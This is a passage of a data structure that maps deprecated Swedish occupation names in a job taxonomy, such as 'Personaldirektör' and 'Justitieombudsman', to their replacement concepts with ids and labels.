'taxonomy/definition': 'Bössmakare', 'taxonomy/preferred-label': 'Bössmakare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KiD2_B8H_U7U', 'taxonomy/definition': 'Vapentekniker', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Vapentekniker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YHB5_wmX_UCt', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Juridisk ombudsman', 'taxonomy/preferred-label': 'Juridisk ombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Sdc8_zgb_WFe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Teaterinspicient', 'taxonomy/preferred-label': 'Teaterinspicient',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Zjz2_R2c_ySs', 'taxonomy/definition': 'Inspicient', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inspicient'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NBpU_vTR_B6S', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'TV-inspicient', 'taxonomy/preferred-label': 'TV-inspicient',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Zjz2_R2c_ySs', 'taxonomy/definition': 'Inspicient', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inspicient'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'cCYi_JUn_K8P', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Jordbruksforskare', 'taxonomy/preferred-label': 'Jordbruksforskare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'oRBx_v9Q_vH2', 'taxonomy/definition': 'Forskare, jordbruk',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Forskare, jordbruk'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '5bp9_eBL_BPF', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Trädgårdsforskare', 'taxonomy/preferred-label': 'Trädgårdsforskare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Co7T_yKa_Zb1', 'taxonomy/definition': 'Forskare, trädgårdsvetenskap',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Forskare, trädgårdsvetenskap'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'CWK4_8NM_4YY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Bild- och reprografiker',
'taxonomy/preferred-label': 'Bild- och reprografiker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'gUu8_FXb_qCv', 'taxonomy/definition': 'Prepressoperatör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Prepressoperatör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'mL3G_SKE_mab', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Desktopoperatör', 'taxonomy/preferred-label': 'Desktopoperatör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'gUu8_FXb_qCv', 'taxonomy/definition': 'Prepressoperatör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Prepressoperatör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AfoB_XP5_5Ak', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Originalmontör', 'taxonomy/preferred-label': 'Originalmontör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'SxqC_BSK_D3u', 'taxonomy/definition': 'Originalare/Final Art',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Originalare/Final Art'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'd2gz_es2_pX5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kvalitetskoordinator',
'taxonomy/preferred-label': 'Kvalitetskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'hQtr_vwy_MGb',
'taxonomy/definition': 'Kvalitetssamordnare/Kvalitetskoordinator',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kvalitetssamordnare/Kvalitetskoordinator'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'E9Fm_7C2_uYU', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kameraman, TV', 'taxonomy/preferred-label': 'Kameraman, TV',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'JfyC_gDr_U4e', 'taxonomy/definition': 'TV-fotograf', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'TV-fotograf'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7pvW_ATp_bnx', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'TV-redigerare', 'taxonomy/preferred-label': 'TV-redigerare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'K1k3_ZHN_PTh', 'taxonomy/definition': 'Redigerare, rörlig bild',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redigerare, rörlig bild'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'N9fQ_uJ4_1vB', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Videoredigerare', 'taxonomy/preferred-label': 'Videoredigerare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'K1k3_ZHN_PTh', 'taxonomy/definition': 'Redigerare, rörlig bild',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redigerare, rörlig bild'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'SR8Z_ESt_FfC', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Förbundskassör', 'taxonomy/preferred-label': 'Förbundskassör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'yjaM_pAe_u9m', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Varuhuschef', 'taxonomy/preferred-label': 'Varuhuschef',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'WWVG_4sM_faC', 'taxonomy/definition': 'Butikschef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Butikschef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ssNi_aPV_7o3', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Assistent, bostadsförmedling',
'taxonomy/preferred-label': 'Assistent, bostadsförmedling', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'WL4K_4RF_NEJ', 'taxonomy/definition': 'Bostadsförmedlare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Bostadsförmedlare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '79uB_oJR_dSQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personaldirektör', 'taxonomy/preferred-label': 'Personaldirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'y22E_Nz6_5VU', 'taxonomy/definition': 'HR-chef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-chef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nSdx_qDe_vCh', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalintendent', 'taxonomy/preferred-label': 'Personalintendent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'y22E_Nz6_5VU', 'taxonomy/definition': 'HR-chef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-chef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4xEL_DVf_rNV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Abonnemangskontorist',
'taxonomy/preferred-label': 'Abonnemangskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'aoUt_f9s_rAk', 'taxonomy/definition': 'Abonnemangsförsäljare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Abonnemangsförsäljare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YrxV_b6A_Dav', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Annonssekreterare', 'taxonomy/preferred-label': 'Annonssekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'MegR_77J_CGU', 'taxonomy/definition': 'Annonsassistent/Annonssekreterare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Annonsassistent/Annonssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 't4QA_LXF_Z3T', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Beställningskontorist',
'taxonomy/preferred-label': 'Beställningskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'W8Kb_rxf_uRQ',
'taxonomy/definition': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'mXSF_yMY_ppH', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Försäljningssekreterare',
'taxonomy/preferred-label': 'Försäljningssekreterare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'HFuj_YCt_Ymn',
'taxonomy/definition': 'Försäljningsassistent/Försäljningssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäljningsassistent/Försäljningssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2YDV_mGq_LpN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Inköpsassistent', 'taxonomy/preferred-label': 'Inköpsassistent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'W8Kb_rxf_uRQ', 'taxonomy/definition': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ZyDH_2Xe_bfK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Inköpskontorist', 'taxonomy/preferred-label': 'Inköpskontorist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'W8Kb_rxf_uRQ', 'taxonomy/definition': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NikA_KEh_Ky4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Säljassistent', 'taxonomy/preferred-label': 'Säljassistent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'HFuj_YCt_Ymn', 'taxonomy/definition': 'Försäljningsassistent/Försäljningssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäljningsassistent/Försäljningssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AfxM_9dB_xbC', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Säljsekreterare', 'taxonomy/preferred-label': 'Säljsekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'HFuj_YCt_Ymn', 'taxonomy/definition': 'Försäljningsassistent/Försäljningssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäljningsassistent/Försäljningssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '33CY_8xp_U24', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Justitieombudsman', 'taxonomy/preferred-label': 'Justitieombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4pdy_hXe_krp', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Diskrimineringsombudsman',
'taxonomy/preferred-label': 'Diskrimineringsombudsman', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Qf5a_Awb_Xr1', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Konsumentombudsman', 'taxonomy/preferred-label': 'Konsumentombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '6qFX_Cmu_o5U', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Näringsfrihetsombudsman',
'taxonomy/preferred-label': 'Näringsfrihetsombudsman', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7J2i_94b_ow4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Fastighetsdirektör', 'taxonomy/preferred-label': 'Fastighetsdirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'wUKi_LRW_Wxk', 'taxonomy/definition': 'Fastighetschef/Fastighetsdirektör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Fastighetschef/Fastighetsdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nHFx_RFe_giS', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Ekonomiledare', 'taxonomy/preferred-label': 'Ekonomiledare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iCy6_G72_abh', 'taxonomy/definition': 'Ekonomichef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomichef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'qic5_pQo_xhT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Länsassessor', 'taxonomy/preferred-label': 'Länsassessor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'U9AU_Rre_pbM', 'taxonomy/definition': 'Assessor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Assessor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Qgmk_7Xb_z4q', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Socialdirektör', 'taxonomy/preferred-label': 'Socialdirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jn3U_UTt_PUJ', 'taxonomy/definition': 'Socialchef/Socialdirektör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Socialchef/Socialdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'noSX_WNd_Nxv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsbyggnadsdirektör',
'taxonomy/preferred-label': 'Stadsbyggnadsdirektör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'DWv2_Yu9_yo6',
'taxonomy/definition': 'Stadsbyggnadschef/Stadsbyggnadsdirektör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Stadsbyggnadschef/Stadsbyggnadsdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'SpMJ_sSm_Vjp', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Teknisk direktör, kommun',
'taxonomy/preferred-label': 'Teknisk direktör, kommun', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'iJfW_Lt2_sQt', 'taxonomy/definition': 'Teknisk chef, kommun',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Teknisk chef, kommun'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kNQH_LXD_eLe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'IT-revisor', 'taxonomy/preferred-label': 'IT-revisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'jNaB_ozm_pm7', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Internatföreståndare',
'taxonomy/preferred-label': 'Internatföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'VKcv_Mbu_KJE',
'taxonomy/definition': 'Internatföreståndare/Skolmåltidsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Internatföreståndare/Skolmåltidsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '44uM_XPP_VdK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Parkeringsvakt', 'taxonomy/preferred-label': 'Parkeringsvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'rfpp_bnQ_RoQ', 'taxonomy/definition': 'Parkeringsvakt/Trafikövervakare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Parkeringsvakt/Trafikövervakare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ybqj_FXq_K98', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skeppsklarerare/Waterclerk',
'taxonomy/preferred-label': 'Skeppsklarerare/Waterclerk', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'eXwZ_gVJ_39q', 'taxonomy/definition': 'Fartygsagent/Fartygsklarerare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Fartygsagent/Fartygsklarerare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nrya_iNN_6BR', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dataregistrerare', 'taxonomy/preferred-label': 'Dataregistrerare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jqVE_Ux3_VMN', 'taxonomy/definition': 'Dataregistrerare/Registrerare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Dataregistrerare/Registrerare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'zKqM_a5a_29j', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Traffic', 'taxonomy/preferred-label': 'Traffic',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'p3m5_Ndd_6im', 'taxonomy/definition': 'Annonsmottagare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Annonsmottagare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'qtPc_BJB_SYL', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Badvakt', 'taxonomy/preferred-label': 'Badvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GUHc_KyJ_Dst', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Artistförmedlare', 'taxonomy/preferred-label': 'Artistförmedlare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '2LBV_CoV_iEf', 'taxonomy/definition': 'Artistagent/Artistbokare/Artistförmedlare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Artistagent/Artistbokare/Artistförmedlare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'MopY_AvK_MmE', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skolledare', 'taxonomy/preferred-label': 'Skolledare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'j6P1_gJq_a2Q', 'taxonomy/definition': 'Skolchef/Skoldirektör/Skolledare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Skolchef/Skoldirektör/Skolledare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'JGxJ_pEB_yre', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dekoratör', 'taxonomy/preferred-label': 'Dekoratör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'GTFy_iPM_msj', 'taxonomy/definition': 'Butikskommunikatör/Visual merchandiser',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Butikskommunikatör/Visual merchandiser'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'cJ62_FKk_ua6', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kontrollingenjör, elkraft',
'taxonomy/preferred-label': 'Kontrollingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'iXyv_E2W_cqc', 'taxonomy/definition': 'Kontrollanläggningstekniker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kontrollanläggningstekniker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4Ujg_KC9_cLT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Vapenmekaniker', 'taxonomy/preferred-label': 'Vapenmekaniker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KiD2_B8H_U7U', 'taxonomy/definition': 'Vapentekniker', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Vapentekniker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 't2pX_4bB_xCG', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Bildingenjör', 'taxonomy/preferred-label': 'Bildingenjör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'm8ED_BbT_twk', 'taxonomy/definition': 'Bildingenjör/BING, film/BING, TV',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Bildingenjör/BING, film/BING, TV'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dh7h_HbH_Cus', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Företagsledare', 'taxonomy/preferred-label': 'Företagsledare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nvUH_JLD_s4F', 'taxonomy/definition': 'Verkställande direktör/VD',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Verkställande direktör/VD'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '5Nkq_7DE_hoo', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Byggmästare', 'taxonomy/preferred-label': 'Byggmästare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'NZcr_uB1_6rX', 'taxonomy/definition': 'Platschef, bygg',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Platschef, bygg'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'saUi_aP6_zhU', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dansare, show', 'taxonomy/preferred-label': 'Dansare, show',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'euJP_wxo_skF', 'taxonomy/definition': 'Dansare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Dansare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4i7D_pQL_DNa', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, produktion, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, produktion, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'XZrs_VW9_31C', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, kvalitet, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, kvalitet, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'p4vQ_Dpo_d6a', 'taxonomy/definition': 'Elkvalitetsanalytiker, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Elkvalitetsanalytiker, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Be1K_Dp4_DrD', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, kontroll, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, kontroll, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'fYBk_dfW_DJc',
'taxonomy/definition': 'Kontrollanläggningsingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kontrollanläggningsingenjör, elkraft'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'WhsT_BWb_dPy', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, konstruktion, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, konstruktion, elkraft',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4QjK_RpG_h4w', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, drift och underhåll, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, drift och underhåll, elkraft',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Yyn9_wQV_Wb8', 'taxonomy/definition': 'Underhållsanalytiker, elkraft',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Underhållsanalytiker, elkraft'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GtGP_PiD_yRc', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, anläggning, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, anläggning, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nr69_xvF_c4f', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Barnombudsman', 'taxonomy/preferred-label': 'Barnombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'MGBV_LVk_AtK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Användbarhetsdesigner',
'taxonomy/preferred-label': 'Användbarhetsdesigner', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'QQjZ_NAN_bDR', 'taxonomy/definition': 'Interaktionsdesigner',
